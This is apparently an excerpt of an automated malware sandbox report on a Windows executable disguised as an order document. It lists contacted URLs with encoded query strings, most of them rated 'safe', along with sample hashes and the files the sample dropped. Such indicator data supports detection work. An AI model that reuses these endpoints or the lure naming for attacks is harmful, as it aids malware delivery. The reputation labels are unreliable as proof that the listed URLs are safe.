http://www.hondamechanic.today/pv57/	false	Avira URL Cloud: safe	unknown
http://www.architect-usschool.com/s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM=	true	Avira URL Cloud: malware	unknown
http://www.tedjp-x.com/rxdf/?OdjTHtuX=n5pckC1kDFTF1S5BKIsmiJ5ryDhRlCYaQVQlc2liktwXiyajKP48Wkncu6FoMqtxFtMv+2TSpEcAsDV+dI8BV0td651LvJeUOcJvnAipjtqBUQAoEW2kSo5oIr+iYWP+5LowsUg=&Y6vp=3PLd8j	false	Avira URL Cloud: safe	unknown
http://www.tedjp-x.com/rxdf/	false	Avira URL Cloud: safe	unknown
http://www.rz6grmvv.shop/wvam/	false	Avira URL Cloud: safe	unknown
http://www.fondazionegtech.org/jmiz/?Y6vp=3PLd8j&OdjTHtuX=FlIs+r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p/5DHHhHlE1nDIZgKO5qXvVh1+gwmyYcA+2CCaGrmZckpjuvJQ96WUy8TtzIG0Do=	false	Avira URL Cloud: safe	unknown
http://www.3cubesinterior.in/n8zi/	false	Avira URL Cloud: safe	unknown
http://www.mengistiebethlehem.com/92z0/?OdjTHtuX=Gchg326o6RWN/XFADw/V4eD2MO3apSP8yQOPkbolGTbWXGJL1kFLipwvr6KFDeoH1MC+XiIJPCdl50bZjywkZNBk97uFxrq9QGi9z8UXs1GhAfMLlFrOVkcHu0q9EP6WPl8Zh5k=&Y6vp=3PLd8j	false	Avira URL Cloud: safe	unknown
http://www.superunicornpalace.com/mwa4/	false	Avira URL Cloud: safe	unknown
http://www.rz6grmvv.shop/wvam/?Y6vp=3PLd8j&OdjTHtuX=ppN4Kg7gaCRo+jf4iLEmna60kcJd+oo7/wZIRMT4+Man5OlGV28GmQNPMVld/mi8klF/kBnYjgc4RUC2chY7WuIAYm4xk+Ll6sKGI2rWgbxJmoqgO5rVx7RJwqzCMQvvfrLjQU4=	false	Avira URL Cloud: safe	unknown
http://www.easybackpage.net/3jr0/?OdjTHtuX=C6nbN3Z6SrmD48dKFL5Pdr+cZFmYp1QsQ3e628IyGZcRZCB2vhKb6ox4g6I37OYbmAVSFMbRXnVDWcusSAPk0vfQfIagm0ASlZK02lSA38wn9PDfH1oUKWJrxTMbBcOAU+1qziI=&Y6vp=3PLd8j	false	Avira URL Cloud: safe	unknown
http://www.hellokong.xyz/oui5/?OdjTHtuX=SBbMJInblZiNUqJtj2t3oAZeaf7w1Mr63FaPzYR5npk3jTg+edZF9NME4tF9tViJCHx7c4tSq6N/qcOwzg98IChDG2ekcZOWcYJRK2znKimA3GQ/fbvAwxxdlKlVh8HBUwdv3Sg=&Y6vp=3PLd8j	false	Avira URL Cloud: safe	unknown
http://www.3cubesinterior.in/n8zi/?Y6vp=3PLd8j&OdjTHtuX=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw=	false	Avira URL Cloud: safe	unknown
http://www.mengistiebethlehem.com/92z0/	false	Avira URL Cloud: safe	unknown
http://www.ad14.fun/oc7s/?Y6vp=3PLd8j&OdjTHtuX=ITz00edB1Uq7JDbRPTK5B57t89T2WQZ+hnFFsCQVLpiDf2LeJizgG+jH2jz5I+TBlRR/yAoHWWMQTB4d0WCMdZHpvgPMtRMFWqdBjyYGuisLgsnAd4XsPoSnl82L2CWvs48fsL0=	false	Avira URL Cloud: safe	unknown
http://www.hondamechanic.today/pv57/?OdjTHtuX=6UcJOPuI3ds3m8dRFaGqe18kk0aRE6C9zfep+6iQQcPKXv8sEJKo1I2dFrwlAwFzKSJLgqMZnt8gW4RLGDqdj2op7I/d7Qwx4DLM/Sb7UzOzABLy3akf6gQBeurdxZRPhPoEffE=&Y6vp=3PLd8j	false	Avira URL Cloud: safe	unknown
http://www.easybackpage.net/3jr0/	false	Avira URL Cloud: safe	unknown
http://www.artvectorcraft.store/s0j2/	false	Avira URL Cloud: safe	unknown
http://www.ad14.fun/oc7s/	false	Avira URL Cloud: safe	unknown

ID:	1467083
Product:	CloudBasic
Start time:	17:54:53
Start date:	03.07.2024
Sample:	Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	7c33fb31e0b8302eba116a02e649200b
SHA1:	b8cf4b26acf2cfb9f48ccc49a05b308425cbbd07
SHA256:	b250139ddfe1f4e0849357b17563dcd09d2dc82f69730c7e5e3797148b47ce16
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	F5C607E507119C024A8457EB53A4EACA	E12BA3AFFE22D4699D53BBBFB38281EB20C79523	B5C5E419F4854F669A4DF47860787886BC46FAC9C6DC97E39A9F118E79F55AEF
C:\Users\user\AppData\Local\Temp\N77o9w1836	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8	271D5F995996735B01672CF227C81C17	7AEAACD66A59314D1CBF4016038D3A0A956BAF33	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vu4nlwr.vnu.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ibragxpy.lej.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxqwflws.i4u.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vkv0134n.icc.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7